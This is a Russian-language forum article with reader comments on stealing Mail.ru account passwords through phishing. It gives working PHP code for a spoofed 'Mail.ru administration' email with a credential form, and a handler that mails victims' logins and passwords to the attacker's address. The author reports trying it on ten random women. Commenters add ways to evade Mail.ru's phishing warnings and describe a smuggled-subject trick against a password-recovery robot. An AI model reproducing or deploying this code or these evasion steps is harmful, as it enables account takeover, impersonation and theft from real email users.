Не буду взламывать сервер, не буду использовать sql-инъекции, не буду воровать cookies. Потому что большинство этих способов уже не работает – дыры в почтовых сервисах залатывают. Большинство статей по взлому почты безнадежно устарели. Буду использовать социальную инженерию.
Социальная инженерия - это метод несанкционированного доступа к информации или системам хранения информации без использования технических средств. Метод основан на использовании слабостей человеческого фактора и считается очень разрушительным. Злоумышленник получает информацию, например, путем сбора информации о служащих объекта атаки, с помощью обычного телефонного звонка или путем проникновения в организацию под видом ее служащего. Злоумышленник может позвонить работнику компании (под видом технической службы) и выведать пароль, сославшись на необходимость решения небольшой проблемы в компьютерной системе. Очень часто этот трюк проходит.
Пользователю приходит письмо от администрации mail.ru, в котором написано что мы переходим на новое оборудование и ваш ящик переносится на другой сервер. Поэтому вы должны подтвердить ваши данные. Чуть ниже размещена форма для ввода данных (имя, текущий пароль и т.д.). Далее пользователь заполняет форму, нажимает кнопку отправить и данные уходят на другой сервер, где сохраняются, а потом его перекидывает обратно на mail.ru. Все это проходит незаметно для пользователя. Единственная проблема чтобы пользователь поверил в правдивость письма. Для этого подделывается ящик отправителя administration@mail.ru и все фразы в тексте должны быть стандартными (вроде “благодарим Вас за понимание…”).
Подделываем письмо.
<?php
$subject="Внимание! Перенос вашего аккаунта!";
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="From: Администрация Mail.Ru <administration@mail.ru>\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="<body>
<table width=100% height=40 cellpadding=0 cellspacing=0 class=blue bgcolor='#00468C'>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
<td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>
<td width=100%> </td>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
</table>
<br>
<b>Уважаемый пользователь name@mail.ru!</b><br>
От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.<br>
<b><font color='#ff0000'>В противном случае Вы можете лишиться своего
почтового ящика!</font></b><br><br>
<b>Заполните нижеприведенную форму:</b>
<form method='post' action='http://hack-server.ru/form.php'>
<table width='400px' cellpadding=0 cellspacing=0>
<tr><td><b>Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr>
<tr><td><b>Пароль: </b></td><td><input type='password' name='pass'></td></tr>
<tr><td><b>Подтвердите пароль: </b></td><td><input type='password' name='pass2'></td></tr>
<tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr>
<tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr>
</table>
<input type='submit' value='Отправить'>
</form>
Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>
С уважением, администрация Mail.ru
<br><br><br><br><br></body>";
mail('name@mail.ru', $subject, $msg, $header);
?>
Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.
После того, как пользователь заполнил форму и отправил, содержимое формы приходит в скрипт, который вы указали в теге form. Нам лишь остается взять эти данные и перекинуть пользователя обратно.
<?php
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg = $_POST['login'];
$subject = 'логин: '.$_POST['login'].'<br>';
$subject .= 'пароль: '.$_POST['pass'].'<br>';
$subject .= 'имя: '.$_POST['name'].'<br>';
$subject .= 'фамалия: '.$_POST['family'];
mail("hacker@ya.ru", $msg, $subject, $header);
$location = $_SERVER['HTTP_REFERER'];
header("Location: http://win.mail.ru/cgi-bin/start?top=1");
?>
Как видно нам необходим сервер, с которого нужно отправить письмо и обработать форму. Я регистрировал сайт на бесплатном хостинге с php. Сейчас этот хостинг закрылся, но если поискать, то найти бесплатный хостинг с php можно.
Тестирование. Тренироваться будем на кошках. Я решил взять 10 случайных девочек. Почтовые адреса можно взять на mail-ответы. Все ящики открыты. Нужно лишь навести курсор на иконку mail-агента.
Отправил письма. К вечеру все 10 паролей были у меня.
Разумеется, данный способ рассчитан на простых пользователей. Тем не менее, до сих пор работают нигерийские письма, так что будьте бдительны!
уха-ха похлеще анекдотов, Серёга, вариант с девушками просто портясающий.
Правда телефонные звонки - это большой гемор, да и проканает с гораздо меньшим успехом.
10 из 10? :) Вверх эффективности.
На свиданки так же разводить.
а куда логи созраняються вот я залил на сервер,отправил письмо,ввёл данные нажал отправить он выполнил скрипт и я оказался в ящике а куда пароль сохранился?
mail("hacker@ya.ru", $msg, $subject, $header);
пароль улеттел на почту hacker@ya.ru
Чет тут туповато описано,написанно только коды а вот че с ними нужно делать нет создавать страницы или чего
да ваще тупая статья закорючки какие-то куда их вставлять-то нада или чего
статья написана для тех кто знает немного PHP
Кто-нибудь знает как решить такую проблему: делаю все как надо, и работает, и пароль присылается, но! Пробовал на своем же собственном ящике все это делать. И на mail.ru в конце письма вставляется надпись красными буквами, что типа администрация mail.ru никогда не требует прислать пароль от ящика и т.д. и т.п. и не попадайтесь на уловки мошенников. Как можно схитрить, чтобы эта надпись не появлялась?
Видимо уже закрыли эту "дырку". Этот способ я пробовал 2 года назад.
Нужно экспериментировать с текстом. Они на автомате смотрят в письме наличие опасных слов. Нужно убрать оттуда фразы "Администрация mail.ru", "выслать пароль" и др. Можно заменить их на "безобидные" синонимы или на английский язык.
Вроде как получилось, хотя и с некоторыми потерями. Долго экспериментировал и пришел к такому варианту. Во-первых, нужно заменить в тексте формы надписи "Пароль" и "Подтвердите пароль" на картинки с этими надписями, сделанные через принт скрин и пэйнт. Во-вторых, нужно заменить в коде странцицы в полях "Пароль" и "Подтвердите пароль" type='password' на type='text'. Правда при этом не будут появляться звездочки при вводе пароля, а все будет открытым текстом вводится, что уменьшает правдоподобность, но по другому я пока не придумал. В-третьих, нужно заменить в этих же строчках name='pass' и name='pass2' на name='pole' и name='pole2'. Конечно можно и не pole, а все что в голову прийдет, лишь бы не pass.:-) И, наконец, в-четвертых, в файле form.php также заменить в строчке $subject .= 'пароль: '.$_POST['pass'].''; слово pass на pole. Таким образом мэйл.ру никаких комментариев не вставляет.
Кстати, удобно все это делать в программе Mozilla Thunderbird. Редактировать удобно, да и HTML вставляет без проблем.
Михаил, а можно както с вами связаться, дабы вы проинструктировали меня по этой теме?
Да я и сам не особо знаток, просто кое-как разобрался. А что конкретно вам непонятно? Пишите прямо здесь, чем смогу помогу.
а куда этот весь код вписывать? и можете точнее написать для чайников, не фига не понял.
Нужно создать php-страницу и запустить ее.
Если ты не знаешь как это делать, то данная статья не для тебя.
я видел как один парень не буду говорить это слово скажу так открыл не законно почту, без писем, не то что здесь ждешь пока придет письмо, а он быстро, он знал только адрес почты человека, зашел меню пуск там есть кнопка выполнить он нажал , а дальше я не знаю что он набрал там, пароль сразу пришел, Может кто знает как быстро узнать пароль на почту?. Подскажите.
люди ув меня не получаеться просто нажимаю отправить письмо пишу кому отправил и мне текс приходит со всякими закарчками ну такойже как даёт нам автор статьи как зделать так что быон пришёл нормально и от администрации маил ру
Почему то у меня не перебрасывает пользователя обратно к нему на http://win.mail.ru/cgi-bin/start?top=1
Как избавиться от ява скрипта? У меня все получается, о чем здесь написал автор. Проблема в том что когда жертва жмент отправить выскакивает ява скрипт, который предупреждает что данные с формы полетят на такой .... сайт. Как зделать чтобы этот скрипт обойти?
#19 Скорее всего уже никак. Эту дырку прикрыли путем предупреждения пользователя. Остается надеяться, что пользоватлель нажмет кнопку ОК.
Взлом почты на Mail.ru Всё очень просто. По адресу pass_recowery@mail.ru сидит mail-робот, который
анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу
шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся
будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем
два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )
Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pasword_remind@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они
правильные!
login=hacker&pass=qwerty&answer=
Итого: тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы
разделяются точкой с запятой.
не катит уже, mail.ru распознаёт action=''
и даёт предупреждение что типо не вводите данные
А как ты вообще на его ящик попал? Вот я проверил на своём ящике,всё ввёл пвильно,а как потом я смогу попать на тот ящик,чью информацию ввёл?И как ты вообще оказался в почте пользователя? или это уже не работает?